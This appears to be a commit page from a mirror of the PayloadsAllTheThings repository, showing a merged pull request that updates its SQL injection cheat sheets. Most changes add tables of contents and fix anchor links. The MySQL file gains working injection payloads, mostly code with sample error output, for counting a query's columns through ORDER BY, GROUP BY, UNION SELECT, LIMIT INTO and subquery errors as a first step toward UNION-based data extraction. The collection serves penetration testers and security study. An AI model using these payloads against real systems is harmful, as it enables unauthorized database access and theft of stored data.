wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-07 19:56:26 +02:00
Code Issues Releases Activity

Merge pull request #116 from nizam0906/master 

Added More Updates in SQL Injection
This commit is contained in:
Swissky 2019-10-29 17:11:28 +01:00 committed by GitHub
parent b7fdf8aa3f d41e0d33bd
commit 55d1731897
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 122 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
SQL Injection/Cassandra Injection.md
View File

@ -2,6 +2,14 @@
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
## Summary
* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
* [Login Bypass 0](#login-bypass-0)
* [Login Bypass 1](#login-bypass-1)
* [References](#references)
## Cassandra comment
```sql
@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h
## References
* [Injection In Apache Cassandra Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
* [Injection In Apache Cassandra Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)

8
SQL Injection/HQL Injection.md
View File

@ -1,6 +1,12 @@
# Hibernate Query Language Injection
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
## Summary
* [HQL Comments](#hql-comments)
* [HQL List Columns](#hql-list-columns)
* [HQL Error Based](#hql-error-based)
* [References](#references)
## HQL Comments
@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro
* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)

8
SQL Injection/MSSQL Injection.md
View File

@ -5,18 +5,18 @@
* [MSSQL comments](#mssql-comments)
* [MSSQL version](#mssql-version)
* [MSSQL database name](#mssql-database-name)
* [MSSQL List databases](#mssql-list-database)
* [MSSQL List databases](#mssql-list-databases)
* [MSSQL List columns](#mssql-list-columns)
* [MSSQL List tables](#mssql-list-tables)
* [MSSQL Extract user/password](#mssql-extract-user-password)
* [MSSQL Extract user/password](#mssql-extract-userpassword)
* [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based)
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked query](#mssql-stack-query)
* [MSSQL Stacked query](#mssql-stacked-query)
* [MSSQL Command execution](#mssql-command-execution)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Make user DBA](#mssql-make-user-dba)
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
## MSSQL comments

83
SQL Injection/MySQL Injection.md
View File

@ -3,10 +3,10 @@
## Summary
* [MYSQL Comment](#mysql-comment)
* [Detect columns number](#detect-columns-number)
* [MYSQL Union Based](#mysql-union-based)
* [Extract database with information_schema](#extract-database-with-information-schema)
* [Extract data without information_schema](#extract-data-without-information-schema)
* [Detect columns number](#detect-columns-number)
* [Extract database with information_schema](#extract-database-with-information_schema)
* [Extract columns name without information_schema](#extract-columns-name-without-information_schema)
* [Extract data without columns name](#extract-data-without-columns-name)
* [MYSQL Error Based](#mysql-error-based)
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
@ -15,10 +15,10 @@
* [MYSQL Blind](#mysql-blind)
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set)
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
* [MYSQL Time Based](#mysql-time-based)
* [Using SLEEP in a subselect](#using-asleep-in-a-subselect)
* [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
* [Using conditional statements](#using-conditional-statements)
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
* [MYSQL Current queries](#mysql-current-queries)
@ -46,17 +46,76 @@
## MYSQL Union Based
### Extract database with information_schema
### Detect columns number
First you need to know the number of columns, you can use `order by`.
First you need to know the number of columns
##### Using `order by` or `group by`
Keep incrementing the number until you get a False response.
Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
```sql
order by 1
order by 2
order by 3
...
order by XXX
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
or
```sql
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
##### Using `order by` or `group by` Error Based
Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
```sql
1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
# Unknown column '4' in 'order clause'
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
or
```sql
1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
# Unknown column '4' in 'group statement'
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
##### Using `UNION SELECT` Error Based
This method works if error showing is enabled
```sql
1' UNION SELECT @--+ #The used SELECT statements have a different number of columns
1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns
1' UNION SELECT @,@,@--+ #No error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
##### Using `LIMIT INTO` Error Based
This method works if error showing is enabled.
It is useful for finding the number of columns when the injection point is after a LIMIT clause.
```sql
1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns
1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns
1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based
This works if you know the table name you're after and error showing is enabled.
It will return the amount of columns in the table, not the query.
```sql
1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s)
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
### Extract database with information_schema
Then the following codes will extract the databases'name, tables'name, columns'name.

15
SQL Injection/OracleSQL Injection.md
View File

@ -1,5 +1,18 @@
# Oracle SQL Injection
## Summary
* [Oracle SQL version](#oracle-sql-version)
* [Oracle SQL database name](#oracle-sql-database-name)
* [Oracle SQL List databases](#oracle-sql-list-databases)
* [Oracle SQL List columns](#oracle-sql-list-columns)
* [Oracle SQL List tables](#oracle-sql-list-tables)
* [Oracle SQL Error Based](#oracle-sql-error-based)
* [Oracle SQL Blind](#oracle-sql-blind)
* [Oracle SQL Time Based](#oracle-sql-time-based)
* [Oracle SQL Command execution](#oracle-sql-command-execution)
* [References](#references)
## Oracle SQL version
```sql
@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
SELECT DISTINCT owner FROM all_tables;
```
## Oracle SQL List Column
## Oracle SQL List Columns
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';

4
SQL Injection/PostgreSQL Injection.md
View File

@ -20,8 +20,8 @@
* [PostgreSQL File Read](#postgresql-file-read)
* [PostgreSQL File Write](#postgresql-file-write)
* [PostgreSQL Command execution](#postgresql-command-execution)
* [CVE-20199193](#cve-20199193)
* [Using libc.so.6](#using-libc-so-6)
* [CVE-20199193](#cve-20199193)
* [Using libc.so.6](#using-libcso6)
* [References](#references)
## PostgreSQL Comments

4
SQL Injection/README.md
View File

@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including:
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
* [Second order injection](#second-order-injection)
* [Shell](#shell)
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including:
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [Authentication bypass](#authentication-bypass)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Routed injection](#routed-injection)

13
SQL Injection/SQLite Injection.md
View File

@ -1,5 +1,18 @@
# SQLite Injection
## Summary
* [SQLite comments](#sqlite-comments)
* [SQLite version](#sqlite-version)
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
* [Boolean - Extract info](#boolean---extract-info)
* [Time based](#time-based)
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
* [References](#references)
## SQLite comments
```sql